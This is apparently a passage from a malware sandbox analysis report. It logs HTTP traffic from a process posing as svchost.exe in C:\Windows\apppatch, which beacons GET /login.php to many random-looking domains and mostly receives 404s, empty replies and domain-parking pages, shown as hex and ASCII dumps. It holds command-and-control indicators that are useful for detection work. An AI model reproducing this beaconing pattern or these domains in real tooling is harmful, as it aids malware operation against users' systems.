                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.227180958 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.512931108 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:44 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                              Nov 11, 2024 18:33:46.973695993 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.258786917 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:47 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              25192.168.2.84973744.221.84.105807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.859117985 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyciz.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.307344913 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:20 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=9dffc4e3d65da5e4a178c6aa9fd52e09|66.23.206.109|1731346400|1731346400|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              26192.168.2.84973864.190.63.136807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.385684013 CET348OUTGET /login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww16.vofycot.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1731346399.8350699
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.040550947 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:20 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_k5dBT5cFvbswD4Cz3yCIj/RSaWf0FhfyrHpcGdPOOfdFdrn+prIXR1jn6xr0Qwmio/mHdg42Dza+517xI4y5gw==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:33:20 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-bsx5j
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6b 35 64 42 54 35 63 46 76 62 73 77 44 34 43 7a 33 79 43 49 6a 2f 52 53 61 57 66 30 46 68 66 79 72 48 70 63 47 64 50 4f 4f 66 64 46 64 72 6e 2b 70 72 49 58 52 31 6a 6e 36 78 72 30 51 77 6d 69 6f 2f 6d 48 64 67 34 32 44 7a 61 2b 35 31 37 78 49 34 79 35 67 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_k5dBT5cFvbswD4Cz3yCIj/RSaWf0FhfyrHpcGdPOOfdFdrn+prIXR1jn6xr0Qwmio/mHdg42Dza+517xI4y5gw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.040987968 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                              Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com AEChas it all. We hope you find what you are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.041002035 CET424INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                              Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.042093992 CET1236INData Raw: 73 65 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30
                                                                                                                                                                                                              Data Ascii: set]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.042107105 CET1236INData Raw: 74 65 6e 74 2d 62 75 79 62 6f 78 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 0d 0a 31 35 46 38 0d 0a 6c 65 66 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e
                                                                                                                                                                                                              Data Ascii: tent-buybox{display:inline-block;text-align:15F8left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buybox__content-link--no-decorat
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.043621063 CET1236INData Raw: 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 7b
                                                                                                                                                                                                              Data Ascii: er-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#949494}.container-cookie-me
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.043632984 CET636INData Raw: 6e 69 74 69 61 6c 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68
                                                                                                                                                                                                              Data Ascii: nitial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;b
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.045277119 CET1236INData Raw: 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72
                                                                                                                                                                                                              Data Ascii: 18838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.045291901 CET1236INData Raw: 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31
                                                                                                                                                                                                              Data Ascii: itch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-colo
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.046979904 CET1236INData Raw: 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74
                                                                                                                                                                                                              Data Ascii: ackground:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;backgr720ound-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transfor
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.047276020 CET1236INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73
                                                                                                                                                                                                              Data Ascii: ext-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-li


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              27192.168.2.849739199.59.243.227807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.413517952 CET350OUTGET /login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww25.lyxynyx.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1731346399.2937263
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.848814011 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:20 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1230
                                                                                                                                                                                                              x-request-id: 41dc0dcd-166b-4eb6-a959-38d5d6625e06
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TKaVdClm9R0mf84Aq6lImHXVDK09w8fz1TDCeUaxmbd32YVpw8265m/Im0tMmH5VNOIUUQ1cVBYK0ZR9+SAlbg==
                                                                                                                                                                                                              set-cookie: parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06; expires=Mon, 11 Nov 2024 17:48:20 GMT; path=/
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4b 61 56 64 43 6c 6d 39 52 30 6d 66 38 34 41 71 36 6c 49 6d 48 58 56 44 4b 30 39 77 38 66 7a 31 54 44 43 65 55 61 78 6d 62 64 33 32 59 56 70 77 38 32 36 35 6d 2f 49 6d 30 74 4d 6d 48 35 56 4e 4f 49 55 55 51 31 63 56 42 59 4b 30 5a 52 39 2b 53 41 6c 62 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TKaVdClm9R0mf84Aq6lImHXVDK09w8fz1TDCeUaxmbd32YVpw8265m/Im0tMmH5VNOIUUQ1cVBYK0ZR9+SAlbg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.849129915 CET664INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDFkYzBkY2QtMTY2Yi00ZWI2LWE5NTktMzhkNWQ2NjI1ZTA2IiwicGFnZV90aW1lIjoxNzMxMzQ2NDAwLCJwYWdlX3VybCI6I


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              28192.168.2.84974164.225.91.73807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.029237032 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyhyg.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.585340977 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:22 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              29192.168.2.86255472.52.179.174807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.603018045 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              30192.168.2.86255672.52.179.174807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.309017897 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              31192.168.2.85838052.34.198.229807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.383193016 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lygyvuj.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.068587065 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:28 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=d7371abaead6f2ed2ae3bcdfd775fd67|66.23.206.109|1731346408|1731346408|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              32192.168.2.86000344.221.84.105807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.747546911 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyhiz.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.189516068 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
